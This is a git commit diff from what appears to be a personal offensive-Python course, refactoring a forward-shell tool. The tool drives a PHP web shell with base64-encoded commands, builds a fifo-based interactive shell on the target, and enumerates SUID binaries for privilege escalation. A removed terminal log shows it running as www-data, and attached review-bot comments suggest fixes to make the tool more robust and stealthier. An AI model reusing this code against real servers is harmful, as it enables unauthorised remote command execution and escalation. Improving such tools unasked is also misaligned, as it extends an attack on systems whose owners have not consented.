


d7252c6782 Update forwardshell script 2024-02-03 12:28:27 +01:00
d4c5d8a50f wip 2024-02-03 12:27:47 +01:00
3 changed files with 154 additions and 190 deletions


@@ -11,24 +11,32 @@ mkfifo input; tail -f input | /bin/sh 2>&1 > output
""" """
import requests import requests
import signal import time
import sys
from termcolor import colored from termcolor import colored
from base64 import b64encode from base64 import b64encode
from random import randrange
def def_handler(sig, frame):
print(colored("\n[!] Exiting...", "blue"))
sys.exit(1)
signal.signal(signal.SIGINT, def_handler) class ForwardShell:
main_url = "http://localhost/index.php" def __init__(self):
session = randrange(100000, 999999)
def run_command(command): self.main_url = "http://localhost/index.php"
self.stdin = f"/dev/shm/{session}.input"
self.stdout = f"/dev/shm/{session}.output"
self.help_options = {
'enum suid': 'FileSystem SUID Privileges Enumeration',
'help': 'Show this help panel',
}
self.is_pseudo_terminal = False
def run_command(self, command):
command = b64encode(command.encode()).decode() command = b64encode(command.encode()).decode()
@@ -36,16 +44,112 @@ def run_command(command):
'cmd': 'echo "%s" | base64 -d | /bin/sh' % command 'cmd': 'echo "%s" | base64 -d | /bin/sh' % command
} }
r = requests.get(main_url, params=data) try:
r = requests.get(self.main_url, params=data, timeout=5)
return r.text return r.text
except:
pass
if __name__ == '__main__': return None
def write_stdin(self, command):
command = b64encode(command.encode()).decode()
data = {
'cmd': 'echo "%s" | base64 -d > %s' % (command, self.stdin)
}
r = requests.get(self.main_url, params=data)
def read_stdout(self):
for _ in range(5):
read_stdout_command = f"/bin/cat {self.stdout}"
output_command = self.run_command(read_stdout_command)
time.sleep(0.2)
return output_command
def setup_shell(self):
command = f"mkfifo {self.stdin}; tail -f {self.stdin} | /bin/sh 2>&1 > {self.stdout}"
self.run_command(command)
def remove_data(self):
remove_data_command = f"/bin/rm {self.stdin} {self.stdout}"
self.run_command(remove_data_command)
def clear_stdout(self):
clear_stdout_command = f"echo '' > {self.stdout}"
self.run_command(clear_stdout_command)
def run(self) -> None:
self.setup_shell()
while True: while True:
command = input(colored("> ", "yellow")) command = input(colored("> ", "yellow"))
output_command = run_command(command)
if "script /dev/null -c bash" in command:
print(
colored("[+] Se ha iniciado una pseudo-terminal", "blue"))
self.is_pseudo_terminal = True
if command.strip() == "enum suid":
command = f"find / -perm -4000 2>/dev/null | xargs ls -l"
if command.strip() == "help":
print(colored(f"\n[+] Listando panel de ayuda:\n", "blue"))
for key, value in self.help_options.items():
print(f"\t{key} - {value}")
continue
self.write_stdin(command + "\n")
output_command = self.read_stdout()
if command.strip() == "exit":
self.is_pseudo_terminal = False
print(colored("[+] Se ha cerrado la pseudo-terminal", "blue"))
self.clear_stdout()
continue
if self.is_pseudo_terminal:
lines = output_command.split("\n")
if len(lines) == 1:
cleared_output = '\n'.join([lines[-1]] + lines[:1])
elif len(lines) > 1:
cleared_output = '\n'.join(
[lines[-1]] + lines[:1] + lines[2:-1])
else:
print(len(lines))
print(lines)
print(cleared_output + "\n")
else:
print(output_command) print(output_command)
self.clear_stdout()
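Review bot: The bare `except: pass` around the request in run_command (top of this hunk) catches every exception, including KeyboardInterrupt and SystemExit, and turns a failed or timed-out request into a silent `None`; read_stdout passes that `None` into run, where `output_command.split("\n")` raises AttributeError in pseudo-terminal mode and a literal `None` is printed otherwise. Narrow it to `except requests.RequestException:` and make run `continue` when `output_command is None`, so a dead target is reported instead of crashing the loop. write_stdin sends its request without the `timeout=5` that run_command now has, so a stalled target still blocks the prompt indefinitely, which is exactly the hang the removed typescript shows for the previous version; give it the same `timeout=5`. The fifo and output file names come from `randrange(100000, 999999)` in __init__ (previous hunk) and live in the world-writable /dev/shm, so they are predictable and, with the default umask, likely readable by other local users on the target; `secrets.token_hex(8)` for the name and a `umask 077;` prefix in setup_shell's command would limit that if it matters for the engagement. ForwardShell's definition starts in the previous hunk.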


@@ -0,0 +1,29 @@
#!/usr/bin/env python3
"""
Fichero principal de la aplicación.
"""
import signal
import sys
from forwardshell import ForwardShell
from termcolor import colored
def def_handler(sig, frame) -> None:
print(colored("\n[!] Exiting...", "blue"))
my_forward_shell.remove_data()
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
if __name__ == '__main__':
my_forward_shell = ForwardShell()
my_forward_shell.run()
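Review bot: def_handler reads the global `my_forward_shell`, but `signal.signal(signal.SIGINT, def_handler)` is installed before that name is bound in the `__main__` block, so a Ctrl-C arriving while `ForwardShell()` is being constructed or during `run`'s `setup_shell` request raises NameError from inside the handler instead of cleaning up. Move `signal.signal(signal.SIGINT, def_handler)` below `my_forward_shell = ForwardShell()`, or guard the cleanup with `if "my_forward_shell" in globals():`. remove_data also issues another HTTP request from within the signal handler; it goes through run_command, so its responsiveness on Ctrl-C depends entirely on that method's timeout, which is worth a one-line comment here, e.g. `# best-effort cleanup of the fifo/output file on the target; bounded by run_command's timeout`.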


@@ -1,169 +0,0 @@
Script started on 2024-02-02 18:20:04+01:00 [TERM="xterm-256color" TTY="/dev/pts/1" COLUMNS="106" LINES="53"]


7🐧 ~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs at ⚡ 18:20:04
 [?2004h[?25l8]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs]1;..hacking/12_fs]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs\%


🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES at ⚡ 18:20:04
 [?1h=[?25h[?2004h[?25l

🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:04
 🏠 192.168.1.115[?25h[?25l

🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:04
 🏠 192.168.1.115 📡 192.145.39.55[?25hscriptscript/[?1l>[?25l[?2004l
 script/[?25h
]2;script/]1;script/%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:09
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004h##!#!//uussrr//bbiinn//eennvv  ppyytthhoonn3[?1l>[?25l[?2004l
 #!/usr/bin/env python3[?25h
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:30
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hccurl -s -X GET 'http://localhost/' -G --data-urlencode 'cmd=cat /etc/resolv.conf 2>&1'co🏠 192.168.1.115 📡 192.145.39.55de index.htmlcoddd           d e index.htmlcode f         irmaMail-Prefapp.htmlo                    rwat rdshell.py[?1l>[?25l[?2004l
 code forwardshell.py[?25h
]2;code forwardshell.py]1;code%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:44
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hppyinstaller --noconsole --onefile backdoor.pypy                                           listener.pyf          irefox_decrypt.pyfo                orrwardshell.py  [?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;pywww-data
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:23:42
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> cat
/
^CTraceback (most recent call last):
File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 23, in <module>
output_command = run_command(command)
File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 14, in run_command
r = requests.get(main_url, params=data)
File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 73, in get
return request("get", url, params=params, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 59, in request
return session.request(method=method, url=url, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 587, in request
resp = self.send(prep, **send_kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 701, in send
r = adapter.send(request, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/adapters.py", line 489, in send
resp = conn.urlopen(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 700, in urlopen
httplib_response = self._make_request(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 446, in _make_request
six.raise_from(e, None)
File "<string>", line 3, in raise_from
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 441, in _make_request
httplib_response = conn.getresponse()
File "/usr/lib/python3.10/http/client.py", line 1375, in getresponse
response.begin()
File "/usr/lib/python3.10/http/client.py", line 318, in begin
version, status, reason = self._read_status()
File "/usr/lib/python3.10/http/client.py", line 279, in _read_status
line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
File "/usr/lib/python3.10/socket.py", line 705, in readinto
return self._sock.recv_into(b)
KeyboardInterrupt
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15/12/script on ☕ main ?1
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> whoami
www-data
> cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.17.0.2 2f2f81768a05
> pwd
/var/www/html
> ^C
[!] Exiting...
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09
 🏠 192.168.1.112 📡 192.145.39.55[?1h=[?2004h[?25l

🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09
 🏠 192.168.1.112 📡 192.145.39.54[?25hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> exit
> ^C
[!] Exiting...
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 6s 🔒 ES vpn at ⚡ 18:35:25
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> exit
> ^C
[!] Exiting...
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 10s 🔒 ES vpn at ⚡ 18:36:02
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> ls
index.php
> e ^C